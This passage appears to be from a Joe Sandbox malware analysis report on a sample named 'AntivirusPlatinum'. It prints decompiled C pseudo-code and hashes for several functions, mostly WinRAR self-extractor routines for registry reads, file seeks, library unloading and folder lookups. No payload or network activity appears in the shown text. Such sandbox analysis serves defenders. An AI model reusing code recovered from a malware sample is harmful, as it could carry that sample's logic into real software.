                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateDirectory$ErrorLastVersion
                                                                                                                                                  • String ID: @Mhv
                                                                                                                                                  • API String ID: 4238167203-3595611156
                                                                                                                                                  • Opcode ID: 0cc14ccfb548368e6c29571d1dbba05db44bbe5f082422575866692aa1a22338
                                                                                                                                                  • Instruction ID: 59de209e465ca692b93f1b9bd8997e8896771fb0caf9f8e2694668fec01ab97a
                                                                                                                                                  • Opcode Fuzzy Hash: 0cc14ccfb548368e6c29571d1dbba05db44bbe5f082422575866692aa1a22338
                                                                                                                                                  • Instruction Fuzzy Hash: 5EF0AF32101A0476EB257A209C09BAB3A68EF05750F14C433FD02F51E0D7788871EE9E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040B9B0(void* __esi, intOrPtr _a4) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				int _v12;
                                                                                                                                                  				int _v16;
                                                                                                                                                  				char _v1040;
                                                                                                                                                  				char _v2064;
                                                                                                                                                  				long _t13;
                                                                                                                                                  
                                                                                                                                                  				if( *0x419f90 != 0) {
                                                                                                                                                  					E0040B901( &_v1040, _a4);
                                                                                                                                                  					_t13 = RegOpenKeyExA(0x80000001, "Software\\WinRAR SFX", 0, 1,  &_v8); // executed
                                                                                                                                                  					if(_t13 == 0) {
                                                                                                                                                  						_v12 = 0x400;
                                                                                                                                                  						if(RegQueryValueExA(_v8,  &_v1040, 0,  &_v16,  &_v2064,  &_v12) == 0) {
                                                                                                                                                  							E0040A477(_a4,  &_v2064);
                                                                                                                                                  						}
                                                                                                                                                  						return RegCloseKey(_v8);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t13;
                                                                                                                                                  			}









                                                                                                                                                  0x0040b9c0
                                                                                                                                                  0x0040b9cc
                                                                                                                                                  0x0040b9e3
                                                                                                                                                  0x0040b9ec
                                                                                                                                                  0x0040ba09
                                                                                                                                                  0x0040ba18
                                                                                                                                                  0x0040ba24
                                                                                                                                                  0x0040ba24
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ba2c
                                                                                                                                                  0x0040b9ec
                                                                                                                                                  0x0040ba33

                                                                                                                                                  APIs
                                                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000001,Software\WinRAR SFX,00000000,00000001,0000000C,?,00000022), ref: 0040B9E3
                                                                                                                                                  • RegQueryValueExA.ADVAPI32(0000000C,?,00000000,00000000,?,?), ref: 0040BA10
                                                                                                                                                  • RegCloseKey.ADVAPI32(0000000C), ref: 0040BA2C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                  • String ID: Software\WinRAR SFX
                                                                                                                                                  • API String ID: 3677997916-754673328
                                                                                                                                                  • Opcode ID: e62ed5703ae6a494e4b9bedd5e0fb16a0a0be06cfa19cc6cd0b7656d05d051e7
                                                                                                                                                  • Instruction ID: 6051d0f75422db7d6b46e309ec543619c6146246f4a2ef773cf3b5fda2ce6207
                                                                                                                                                  • Opcode Fuzzy Hash: e62ed5703ae6a494e4b9bedd5e0fb16a0a0be06cfa19cc6cd0b7656d05d051e7
                                                                                                                                                  • Instruction Fuzzy Hash: 8A011A75500208BEEB11DB90DD45FDE7BBCEB04748F0081A2BB04F1090E7B49A59DB98
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040A82D() {
                                                                                                                                                  				struct tagMSG _v32;
                                                                                                                                                  				int _t6;
                                                                                                                                                  				long _t12;
                                                                                                                                                  
                                                                                                                                                  				_t6 = PeekMessageA( &_v32, 0, 0, 0, 0); // executed
                                                                                                                                                  				if(_t6 != 0) {
                                                                                                                                                  					GetMessageA( &_v32, 0, 0, 0);
                                                                                                                                                  					TranslateMessage( &_v32);
                                                                                                                                                  					_t12 = DispatchMessageA( &_v32); // executed
                                                                                                                                                  					return _t12;
                                                                                                                                                  				}
                                                                                                                                                  				return _t6;
                                                                                                                                                  			}






                                                                                                                                                  0x0040a83e
                                                                                                                                                  0x0040a846
                                                                                                                                                  0x0040a84f
                                                                                                                                                  0x0040a859
                                                                                                                                                  0x0040a863
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040a863
                                                                                                                                                  0x0040a86b

                                                                                                                                                  APIs
                                                                                                                                                  • PeekMessageA.USER32(0040A7FA,00000000,00000000,00000000,00000000), ref: 0040A83E
                                                                                                                                                  • GetMessageA.USER32 ref: 0040A84F
                                                                                                                                                  • TranslateMessage.USER32(?), ref: 0040A859
                                                                                                                                                  • DispatchMessageA.USER32 ref: 0040A863
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Message$DispatchPeekTranslate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4217535847-0
                                                                                                                                                  • Opcode ID: 043e15b43511c9b9b8142bd98649a3dbf74fd64d15c554c5aa4f09793c13f6a9
                                                                                                                                                  • Instruction ID: 9bc01b0654b97ff9a9f2776f7e551ab648acc0d6ddbdf71c92faa3387c9e9ffb
                                                                                                                                                  • Opcode Fuzzy Hash: 043e15b43511c9b9b8142bd98649a3dbf74fd64d15c554c5aa4f09793c13f6a9
                                                                                                                                                  • Instruction Fuzzy Hash: 53E0ED72C0212AA7CB106BF29E0CCDF7F6CEE052517008461B506E2054D678D215C7F5
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                  			E00405351(void* __ecx, long _a4, long _a8, signed int _a12) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				void* _t15;
                                                                                                                                                  				long _t19;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  				void* _t23;
                                                                                                                                                  				void* _t25;
                                                                                                                                                  				long _t28;
                                                                                                                                                  				long _t31;
                                                                                                                                                  
                                                                                                                                                  				_t22 = __ecx;
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				_t25 = __ecx;
                                                                                                                                                  				if( *((intOrPtr*)(__ecx + 4)) == 0xffffffff) {
                                                                                                                                                  					L12:
                                                                                                                                                  					_t15 = 1;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t28 = _a8;
                                                                                                                                                  					_t31 = _t28;
                                                                                                                                                  					if(_t31 <= 0 && (_t31 < 0 || _a4 < 0) && _a12 != 0) {
                                                                                                                                                  						if(_a12 != 1) {
                                                                                                                                                  							_t21 = E0040554A(_t22, _t23, __eflags);
                                                                                                                                                  						} else {
                                                                                                                                                  							_t21 = E00404FDC(_t22, _t23);
                                                                                                                                                  						}
                                                                                                                                                  						_a4 = _a4 + _t21;
                                                                                                                                                  						asm("adc esi, edx");
                                                                                                                                                  						_a12 = _a12 & 0x00000000;
                                                                                                                                                  					}
                                                                                                                                                  					_v8 = _t28;
                                                                                                                                                  					_t19 = SetFilePointer( *(_t25 + 4), _a4,  &_v8, _a12); // executed
                                                                                                                                                  					if(_t19 != 0xffffffff || GetLastError() == 0) {
                                                                                                                                                  						goto L12;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t15 = 0;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t15;
                                                                                                                                                  			}











                                                                                                                                                  0x00405351
                                                                                                                                                  0x00405354
                                                                                                                                                  0x00405356
                                                                                                                                                  0x0040535c
                                                                                                                                                  0x004053be
                                                                                                                                                  0x004053be
                                                                                                                                                  0x0040535e
                                                                                                                                                  0x0040535f
                                                                                                                                                  0x00405362
                                                                                                                                                  0x00405364
                                                                                                                                                  0x00405378
                                                                                                                                                  0x00405381
                                                                                                                                                  0x0040537a
                                                                                                                                                  0x0040537a
                                                                                                                                                  0x0040537a
                                                                                                                                                  0x00405386
                                                                                                                                                  0x00405389
                                                                                                                                                  0x0040538b
                                                                                                                                                  0x0040538b
                                                                                                                                                  0x0040539e
                                                                                                                                                  0x004053a4
                                                                                                                                                  0x004053ae
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004053ba
                                                                                                                                                  0x004053ba
                                                                                                                                                  0x004053ba
                                                                                                                                                  0x004053ae
                                                                                                                                                  0x004053c2

                                                                                                                                                  APIs
                                                                                                                                                  • SetFilePointer.KERNELBASE(?,000000FF,?,?,?,00000000,?,?,00405501,?,?,?,?,0040941C,000000FF), ref: 004053A4
                                                                                                                                                  • GetLastError.KERNEL32(00405501,?,?,?,?,0040941C,000000FF,?,00000000,00000000,?,00000000,00000001,00000000,00000000,?), ref: 004053B0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                  • String ID: @Mhv
                                                                                                                                                  • API String ID: 2976181284-3595611156
                                                                                                                                                  • Opcode ID: ed057684c9aded8822d7a98cc1ab320d41f793df05a2235f4b6bd6fd049a5b35
                                                                                                                                                  • Instruction ID: f3af7dc040878406d74d12ace788650f613bc42b46e0a769c9035ee9dabafcab
                                                                                                                                                  • Opcode Fuzzy Hash: ed057684c9aded8822d7a98cc1ab320d41f793df05a2235f4b6bd6fd049a5b35
                                                                                                                                                  • Instruction Fuzzy Hash: AA018031400B14EFCB148E54C8056EF7769FB003A4F10823AFD25A22D0C7F89951DE99
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E004115FD(struct HINSTANCE__** __ecx) {
                                                                                                                                                  				struct HINSTANCE__* _t3;
                                                                                                                                                  				intOrPtr* _t4;
                                                                                                                                                  				struct HINSTANCE__** _t11;
                                                                                                                                                  				struct HINSTANCE__* _t12;
                                                                                                                                                  
                                                                                                                                                  				_t11 = __ecx;
                                                                                                                                                  				_t3 =  *__ecx;
                                                                                                                                                  				if(_t3 != 0) {
                                                                                                                                                  					FreeLibrary(_t3); // executed
                                                                                                                                                  				}
                                                                                                                                                  				_t12 =  *(_t11 + 4);
                                                                                                                                                  				if(_t12 != 0) {
                                                                                                                                                  					FreeLibrary(_t12);
                                                                                                                                                  				}
                                                                                                                                                  				_t4 =  *0x41fff0; // 0x76f5c100
                                                                                                                                                  				return  *((intOrPtr*)( *_t4 + 8))(_t4);
                                                                                                                                                  			}







                                                                                                                                                  0x004115fe
                                                                                                                                                  0x00411600
                                                                                                                                                  0x0041160b
                                                                                                                                                  0x0041160e
                                                                                                                                                  0x0041160e
                                                                                                                                                  0x00411610
                                                                                                                                                  0x00411615
                                                                                                                                                  0x00411618
                                                                                                                                                  0x00411618
                                                                                                                                                  0x0041161a
                                                                                                                                                  0x00411627

                                                                                                                                                  APIs
                                                                                                                                                  • FreeLibrary.KERNELBASE(00000000,00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,0040D46A), ref: 0041160E
                                                                                                                                                  • FreeLibrary.KERNELBASE(?,00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,0040D46A), ref: 00411618
                                                                                                                                                  Strings
                                                                                                                                                  • C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe, xrefs: 004115FD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                  • String ID: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                  • API String ID: 3664257935-249117747
                                                                                                                                                  • Opcode ID: 5a911f39bc500288cfb1d4df0ab43fc2f250b8dfc3319a74055b1690a66653f5
                                                                                                                                                  • Instruction ID: 62aa9ad67f2bc5607cfcf4aabbf5f4da411644a76b014e87a6fdd9beea94847b
                                                                                                                                                  • Opcode Fuzzy Hash: 5a911f39bc500288cfb1d4df0ab43fc2f250b8dfc3319a74055b1690a66653f5
                                                                                                                                                  • Instruction Fuzzy Hash: 2DE012327011209B86209F59EC049CBF3ECAFD971131A446BF945E3320C7A5EC428AAC
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                  			E0040AAC2(void* __ecx, intOrPtr _a4, int _a8) {
                                                                                                                                                  				struct _ITEMIDLIST* _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				intOrPtr* _t12;
                                                                                                                                                  
                                                                                                                                                  				__imp__SHGetMalloc( &_v12, __ecx, __ecx);
                                                                                                                                                  				SHGetSpecialFolderLocation(0, _a8,  &_v8); // executed
                                                                                                                                                  				__imp__SHGetPathFromIDListA(_v8, _a4); // executed
                                                                                                                                                  				_t12 = _v12;
                                                                                                                                                  				return  *((intOrPtr*)( *_t12 + 0x14))(_t12, _v8);
                                                                                                                                                  			}






                                                                                                                                                  0x0040aacb
                                                                                                                                                  0x0040aada
                                                                                                                                                  0x0040aae6
                                                                                                                                                  0x0040aaec
                                                                                                                                                  0x0040aaf9

                                                                                                                                                  APIs
                                                                                                                                                  • SHGetMalloc.SHELL32(?), ref: 0040AACB
                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,?,?), ref: 0040AADA
                                                                                                                                                  • SHGetPathFromIDListA.SHELL32(?,?), ref: 0040AAE6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FolderFromListLocationMallocPathSpecial
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 628029987-0
                                                                                                                                                  • Opcode ID: 70809a305a85a622d48bfe35fb9c38ef5d9240c8d15e14ba5eed05ab10784309
                                                                                                                                                  • Instruction ID: 88ba9e9cb9406764b26f187acffb5ba189f573144994a3fa657e37118bd86729
                                                                                                                                                  • Opcode Fuzzy Hash: 70809a305a85a622d48bfe35fb9c38ef5d9240c8d15e14ba5eed05ab10784309
                                                                                                                                                  • Instruction Fuzzy Hash: E2E0C276500109FFDF05DFD0DE09EDE7B79EB08205F104060F605D6120D6719A24DB20
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                                  			E004018CB(void* __ecx, void* __edx, void* __edi, CHAR** _a4, long _a8) {
                                                                                                                                                  				char _v28;
                                                                                                                                                  				long _t27;
                                                                                                                                                  				signed int _t29;
                                                                                                                                                  				long _t30;
                                                                                                                                                  				signed int _t35;
                                                                                                                                                  				signed int _t48;
                                                                                                                                                  				long _t50;
                                                                                                                                                  				long _t67;
                                                                                                                                                  				void* _t69;
                                                                                                                                                  				CHAR** _t70;
                                                                                                                                                  
                                                                                                                                                  				_t69 = __ecx;
                                                                                                                                                  				if( *((char*)(__ecx + 0x6d8b)) != 0) {
                                                                                                                                                  					E0040A7E9( &_v28, __edx, __ecx);
                                                                                                                                                  					__eflags =  *(_t69 + 0x4694) & 0x00000002;
                                                                                                                                                  					_push(0);
                                                                                                                                                  					_push(0);
                                                                                                                                                  					if(( *(_t69 + 0x4694) & 0x00000002) == 0) {
                                                                                                                                                  						_push(( *(_t69 + 0x4696) & 0x0000ffff) +  *((intOrPtr*)(_t69 + 0x6d94)) + 7);
                                                                                                                                                  						E004054ED(_t69);
                                                                                                                                                  						_t27 = E00402790(_t69, __edx, __eflags, "CMT");
                                                                                                                                                  						__eflags = _t27;
                                                                                                                                                  						if(_t27 == 0) {
                                                                                                                                                  							L11:
                                                                                                                                                  							_t48 = 0;
                                                                                                                                                  							__eflags = 0;
                                                                                                                                                  							L12:
                                                                                                                                                  							E0040A810( &_v28);
                                                                                                                                                  							_t29 = _t48;
                                                                                                                                                  							L13:
                                                                                                                                                  							return _t29;
                                                                                                                                                  						}
                                                                                                                                                  						_t30 = E00401722(_t69, _a4, _a8); // executed
                                                                                                                                                  						__eflags = _t30;
                                                                                                                                                  						if(_t30 == 0) {
                                                                                                                                                  							goto L11;
                                                                                                                                                  						}
                                                                                                                                                  						_t48 = 1;
                                                                                                                                                  						goto L12;
                                                                                                                                                  					}
                                                                                                                                                  					_push( *((intOrPtr*)(_t69 + 0x6d94)) + 0x14);
                                                                                                                                                  					E004054ED(_t69);
                                                                                                                                                  					E00401CE5(_t69, __edx, __eflags);
                                                                                                                                                  					_t70 = _a4;
                                                                                                                                                  					_t50 = _t70[1];
                                                                                                                                                  					__eflags = _t50;
                                                                                                                                                  					if(_t50 > 0) {
                                                                                                                                                  						OemToCharBuffA( *_t70,  *_t70, _t50);
                                                                                                                                                  						_t67 = _a8;
                                                                                                                                                  						__eflags = _t67;
                                                                                                                                                  						if(_t67 != 0) {
                                                                                                                                                  							E004016BF(_t67, _t50 + 1);
                                                                                                                                                  							E004016A4(_t70, 0);
                                                                                                                                                  							E0040E144( *_t70,  *_t67, _t50 + 1);
                                                                                                                                                  							E00401708(_t70, _t50);
                                                                                                                                                  							E004016BF(_t67, E0040E321( *_t67));
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t35 = E0040A810( &_v28);
                                                                                                                                                  					__eflags = _t70[1];
                                                                                                                                                  					_t29 = _t35 & 0xffffff00 | _t70[1] > 0x00000000;
                                                                                                                                                  					goto L13;
                                                                                                                                                  				}
                                                                                                                                                  				return 0;
                                                                                                                                                  			}













                                                                                                                                                  0x004018d2
                                                                                                                                                  0x004018db
                                                                                                                                                  0x004018e9
                                                                                                                                                  0x004018ee
                                                                                                                                                  0x004018f5
                                                                                                                                                  0x004018f7
                                                                                                                                                  0x004018f9
                                                                                                                                                  0x00401990
                                                                                                                                                  0x00401993
                                                                                                                                                  0x0040199f
                                                                                                                                                  0x004019a4
                                                                                                                                                  0x004019a6
                                                                                                                                                  0x004019bd
                                                                                                                                                  0x004019bd
                                                                                                                                                  0x004019bd
                                                                                                                                                  0x004019bf
                                                                                                                                                  0x004019c2
                                                                                                                                                  0x004019c7
                                                                                                                                                  0x004019c9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004019c9
                                                                                                                                                  0x004019b0
                                                                                                                                                  0x004019b5
                                                                                                                                                  0x004019b7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004019b9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004019b9
                                                                                                                                                  0x00401908
                                                                                                                                                  0x0040190b
                                                                                                                                                  0x00401912
                                                                                                                                                  0x00401917
                                                                                                                                                  0x0040191a
                                                                                                                                                  0x0040191d
                                                                                                                                                  0x0040191f
                                                                                                                                                  0x00401927
                                                                                                                                                  0x0040192d
                                                                                                                                                  0x00401930
                                                                                                                                                  0x00401932
                                                                                                                                                  0x0040193a
                                                                                                                                                  0x00401943
                                                                                                                                                  0x00401950
                                                                                                                                                  0x00401958
                                                                                                                                                  0x00401967
                                                                                                                                                  0x00401967
                                                                                                                                                  0x0040196c
                                                                                                                                                  0x00401973
                                                                                                                                                  0x00401978
                                                                                                                                                  0x0040197a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040197a
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffChar
                                                                                                                                                  • String ID: CMT
                                                                                                                                                  • API String ID: 1973267554-2756464174
                                                                                                                                                  • Opcode ID: 2e9d570f032067c190e5b78061e61d6a7d6deba71149c226ed3cc396c12f8cc3
                                                                                                                                                  • Instruction ID: fbbbaea41a28c93ea3a5d1c6e8216a3bc702e01cd4883bdb15f1a6495baf4321
                                                                                                                                                  • Opcode Fuzzy Hash: 2e9d570f032067c190e5b78061e61d6a7d6deba71149c226ed3cc396c12f8cc3
                                                                                                                                                  • Instruction Fuzzy Hash: 2E21E5717002106BDB10AB21CD91EAF739D9F44708F04442FF856B72E2DB39AD12C799
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                                  			E00404F2E(void* __ecx) {
                                                                                                                                                  				void* _t18;
                                                                                                                                                  				int _t22;
                                                                                                                                                  				signed int _t23;
                                                                                                                                                  				void* _t24;
                                                                                                                                                  				void* _t30;
                                                                                                                                                  
                                                                                                                                                  				_t30 = __ecx;
                                                                                                                                                  				_t24 = 1;
                                                                                                                                                  				if( *(__ecx + 0xc) == 0) {
                                                                                                                                                  					_t18 =  *(__ecx + 4);
                                                                                                                                                  					if(_t18 == 0xffffffff) {
                                                                                                                                                  						L14:
                                                                                                                                                  						 *((intOrPtr*)(_t30 + 0xc1c)) =  *((intOrPtr*)(_t30 + 0xc1c)) + 1;
                                                                                                                                                  						return _t24;
                                                                                                                                                  					}
                                                                                                                                                  					if( *((char*)(__ecx + 0x10)) != 0) {
                                                                                                                                                  						L11:
                                                                                                                                                  						 *(_t30 + 4) =  *(_t30 + 4) | 0xffffffff;
                                                                                                                                                  						if(_t24 == 0 &&  *((intOrPtr*)(_t30 + 0x14)) != _t24) {
                                                                                                                                                  							_t15 = _t30 + 0x17; // 0x17
                                                                                                                                                  							E004032D5(0x414c7c, _t15);
                                                                                                                                                  						}
                                                                                                                                                  						goto L14;
                                                                                                                                                  					}
                                                                                                                                                  					_t22 = FindCloseChangeNotification(_t18); // executed
                                                                                                                                                  					asm("sbb bl, bl");
                                                                                                                                                  					_t24 =  ~(_t22 - 1) + 1;
                                                                                                                                                  					if(1 != 0 ||  *0x414c70 == 0) {
                                                                                                                                                  						_t23 = 0;
                                                                                                                                                  						while( *(0x414870 + _t23 * 4) != _t30) {
                                                                                                                                                  							_t23 = _t23 + 1;
                                                                                                                                                  							if(_t23 < 0x100) {
                                                                                                                                                  								continue;
                                                                                                                                                  							}
                                                                                                                                                  							goto L11;
                                                                                                                                                  						}
                                                                                                                                                  						 *(0x414870 + _t23 * 4) =  *(0x414870 + _t23 * 4) & 0x00000000;
                                                                                                                                                  					}
                                                                                                                                                  					goto L11;
                                                                                                                                                  				}
                                                                                                                                                  				 *(__ecx + 0xc) =  *(__ecx + 0xc) & 0x00000000;
                                                                                                                                                  				goto L14;
                                                                                                                                                  			}








                                                                                                                                                  0x00404f30
                                                                                                                                                  0x00404f36
                                                                                                                                                  0x00404f38
                                                                                                                                                  0x00404f40
                                                                                                                                                  0x00404f46
                                                                                                                                                  0x00404fa1
                                                                                                                                                  0x00404fa1
                                                                                                                                                  0x00404fab
                                                                                                                                                  0x00404fab
                                                                                                                                                  0x00404f4c
                                                                                                                                                  0x00404f86
                                                                                                                                                  0x00404f86
                                                                                                                                                  0x00404f8c
                                                                                                                                                  0x00404f93
                                                                                                                                                  0x00404f9c
                                                                                                                                                  0x00404f9c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404f8c
                                                                                                                                                  0x00404f4f
                                                                                                                                                  0x00404f5a
                                                                                                                                                  0x00404f5c
                                                                                                                                                  0x00404f5e
                                                                                                                                                  0x00404f69
                                                                                                                                                  0x00404f6b
                                                                                                                                                  0x00404f74
                                                                                                                                                  0x00404f7a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404f7c
                                                                                                                                                  0x00404f7e
                                                                                                                                                  0x00404f7e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404f5e
                                                                                                                                                  0x00404f3a
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
